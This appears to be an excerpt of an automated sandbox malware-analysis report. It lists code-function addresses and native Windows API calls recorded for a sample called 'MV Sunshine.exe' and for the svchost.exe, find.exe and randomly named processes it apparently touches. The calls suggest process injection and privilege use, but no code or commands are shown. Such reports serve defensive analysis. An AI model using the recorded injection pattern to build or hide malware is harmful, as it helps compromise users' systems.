Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873090 NtSetValueKey,	2_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873010 NtOpenDirectoryObject,	2_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038739B0 NtGetContextThread,	2_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D10 NtOpenProcessToken,	2_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D70 NtOpenThread,	2_2_03873D70
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03054340 NtSetContextThread,LdrInitializeThunk,	4_2_03054340
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03054650 NtSuspendThread,LdrInitializeThunk,	4_2_03054650
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052B60 NtClose,LdrInitializeThunk,	4_2_03052B60
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_03052BA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_03052BE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_03052BF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052AD0 NtReadFile,LdrInitializeThunk,	4_2_03052AD0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052AF0 NtWriteFile,LdrInitializeThunk,	4_2_03052AF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052F30 NtCreateSection,LdrInitializeThunk,	4_2_03052F30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052FB0 NtResumeThread,LdrInitializeThunk,	4_2_03052FB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052FE0 NtCreateFile,LdrInitializeThunk,	4_2_03052FE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_03052E80
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_03052EE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_03052D10
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_03052D30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052DD0 NtDelayExecution,LdrInitializeThunk,	4_2_03052DD0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_03052DF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052C60 NtCreateKey,LdrInitializeThunk,	4_2_03052C60
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_03052C70
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_03052CA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030535C0 NtCreateMutant,LdrInitializeThunk,	4_2_030535C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030539B0 NtGetContextThread,LdrInitializeThunk,	4_2_030539B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052B80 NtQueryInformationFile,	4_2_03052B80
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052AB0 NtWaitForSingleObject,	4_2_03052AB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052F60 NtCreateProcessEx,	4_2_03052F60
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052F90 NtProtectVirtualMemory,	4_2_03052F90
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052FA0 NtQuerySection,	4_2_03052FA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052E30 NtWriteVirtualMemory,	4_2_03052E30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052EA0 NtAdjustPrivilegesToken,	4_2_03052EA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052D00 NtSetInformationFile,	4_2_03052D00
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052DB0 NtEnumerateKey,	4_2_03052DB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052C00 NtQueryInformationProcess,	4_2_03052C00
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052CC0 NtQueryVirtualMemory,	4_2_03052CC0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03052CF0 NtOpenProcess,	4_2_03052CF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03053010 NtOpenDirectoryObject,	4_2_03053010
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03053090 NtSetValueKey,	4_2_03053090
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03053D10 NtOpenProcessToken,	4_2_03053D10
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03053D70 NtOpenThread,	4_2_03053D70
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02869290 NtDeleteFile,	4_2_02869290
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02869330 NtClose,	4_2_02869330
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02869030 NtCreateFile,	4_2_02869030
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_028691A0 NtReadFile,	4_2_028691A0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_02869490 NtAllocateVirtualMemory,	4_2_02869490

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00684021: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00684021

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00678858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00678858

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0068545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0068545F

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0062E800	0_2_0062E800
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0064DBB5	0_2_0064DBB5
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0062FE40	0_2_0062FE40
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0062E060	0_2_0062E060
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006A804A	0_2_006A804A
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00634140	0_2_00634140
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00642405	0_2_00642405
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00656522	0_2_00656522
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006A0665	0_2_006A0665
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0065267E	0_2_0065267E
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00636843	0_2_00636843
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0064283A	0_2_0064283A
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006589DF	0_2_006589DF
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00638A0E	0_2_00638A0E
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006A0AE2	0_2_006A0AE2
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00656A94	0_2_00656A94
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0067EB07	0_2_0067EB07
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00688B13	0_2_00688B13
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0064CD61	0_2_0064CD61
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00657006	0_2_00657006
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0063710E	0_2_0063710E
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00633190	0_2_00633190
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00621287	0_2_00621287
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006433C7	0_2_006433C7
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0064F419	0_2_0064F419
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006416C4	0_2_006416C4
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00635680	0_2_00635680
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006358C0	0_2_006358C0
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_006478D3	0_2_006478D3
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00641BB8	0_2_00641BB8
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00659D05	0_2_00659D05
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_0064BFE6	0_2_0064BFE6
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00641FD0	0_2_00641FD0
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00F64080	0_2_00F64080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418903	2_2_00418903
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004029D0	2_2_004029D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410213	2_2_00410213
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403215	2_2_00403215
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403220	2_2_00403220
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416B53	2_2_00416B53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410433	2_2_00410433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E4B3	2_2_0040E4B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D81	2_2_00402D81
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040264D	2_2_0040264D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402650	2_2_00402650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EE03	2_2_0042EE03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039003E6	2_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C02C0	2_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F41A2	2_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039001AA	2_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F81CC	2_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830100	2_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864750	2_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C6E0	2_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03900591	2_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EE4F6	2_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4420	2_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F2446	2_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F6BD7	2_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390A9A6	2_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038268B8	2_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E8F0	2_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384A840	2_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03842840	2_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BEFA0	2_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832FC8	2_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384CFE0	2_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03882F28	2_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860F30	2_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E2F30	2_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4F40	2_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852E90	2_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FCE93	2_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEEDB	2_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEE26	2_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840E59	2_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858DBF	2_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383ADE0	2_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384AD00	2_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DCD1F	2_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0CB5	2_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830CF2	2_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840C00	2_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388739A	2_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F132D	2_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382D34C	2_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038452A0	2_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B2C0	2_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E12ED	2_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384B1B0	2_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387516C	2_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382F172	2_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390B16B	2_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EF0CC	2_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038470C0	2_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F70E9	2_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF0E0	2_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF7B0	2_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F16CC	2_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885630	2_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DD5B0	2_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039095C3	2_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7571	2_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF43F	2_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03831460	2_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FB80	2_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B5BF0	2_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387DBF9	2_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFB76	2_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DDAAC	2_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885AA0	2_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E1AA3	2_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EDAC6	2_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFA49	2_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7A46	2_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B3A6C	2_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D5910	2_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849950	2_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B950	2_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038438E0	2_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AD800	2_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03841F92	2_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFFB1	2_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD2	2_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD5	2_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFF09	2_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849EB0	2_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FDC0	2_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03843D40	2_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F1D5A	2_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7D73	2_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFCF2	2_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B9C32	2_2_038B9C32
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AF605B	3_2_02AF605B
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02B169AB	3_2_02B169AB
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AFE6FB	3_2_02AFE6FB
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AF7FDB	3_2_02AF7FDB
Source: C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe	Code function: 3_2_02AF7DBB	3_2_02AF7DBB
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DA352	4_2_030DA352
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030E03E6	4_2_030E03E6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0302E3F0	4_2_0302E3F0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030C0274	4_2_030C0274
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030A02C0	4_2_030A02C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03010100	4_2_03010100
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030BA118	4_2_030BA118
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030A8158	4_2_030A8158
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030E01AA	4_2_030E01AA
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D41A2	4_2_030D41A2
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D81CC	4_2_030D81CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030B2000	4_2_030B2000
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03044750	4_2_03044750
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03020770	4_2_03020770
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0301C7C0	4_2_0301C7C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0303C6E0	4_2_0303C6E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03020535	4_2_03020535
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030E0591	4_2_030E0591
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030C4420	4_2_030C4420
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D2446	4_2_030D2446
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030CE4F6	4_2_030CE4F6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DAB40	4_2_030DAB40
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D6BD7	4_2_030D6BD7
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0301EA80	4_2_0301EA80
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03036962	4_2_03036962
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030229A0	4_2_030229A0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030EA9A6	4_2_030EA9A6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03022840	4_2_03022840
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0302A840	4_2_0302A840
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030068B8	4_2_030068B8
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0304E8F0	4_2_0304E8F0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03062F28	4_2_03062F28
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03040F30	4_2_03040F30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030C2F30	4_2_030C2F30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03094F40	4_2_03094F40
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0309EFA0	4_2_0309EFA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03012FC8	4_2_03012FC8
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0302CFE0	4_2_0302CFE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DEE26	4_2_030DEE26
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03020E59	4_2_03020E59
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03032E90	4_2_03032E90
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DCE93	4_2_030DCE93
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DEEDB	4_2_030DEEDB
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0302AD00	4_2_0302AD00
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030BCD1F	4_2_030BCD1F
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03038DBF	4_2_03038DBF
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0301ADE0	4_2_0301ADE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03020C00	4_2_03020C00
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030C0CB5	4_2_030C0CB5
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03010CF2	4_2_03010CF2
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D132D	4_2_030D132D
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0300D34C	4_2_0300D34C
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0306739A	4_2_0306739A
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030252A0	4_2_030252A0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0303B2C0	4_2_0303B2C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030C12ED	4_2_030C12ED
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030EB16B	4_2_030EB16B
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0305516C	4_2_0305516C
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0300F172	4_2_0300F172
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0302B1B0	4_2_0302B1B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030CF0CC	4_2_030CF0CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030270C0	4_2_030270C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D70E9	4_2_030D70E9
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DF0E0	4_2_030DF0E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DF7B0	4_2_030DF7B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03065630	4_2_03065630
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D16CC	4_2_030D16CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D7571	4_2_030D7571
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030BD5B0	4_2_030BD5B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030E95C3	4_2_030E95C3
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DF43F	4_2_030DF43F
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03011460	4_2_03011460
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DFB76	4_2_030DFB76
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0303FB80	4_2_0303FB80
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03095BF0	4_2_03095BF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0305DBF9	4_2_0305DBF9
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030DFA49	4_2_030DFA49
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030D7A46	4_2_030D7A46
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03093A6C	4_2_03093A6C
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03065AA0	4_2_03065AA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030BDAAC	4_2_030BDAAC
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030C1AA3	4_2_030C1AA3
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030CDAC6	4_2_030CDAC6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_030B5910	4_2_030B5910
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03029950	4_2_03029950
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0303B950	4_2_0303B950
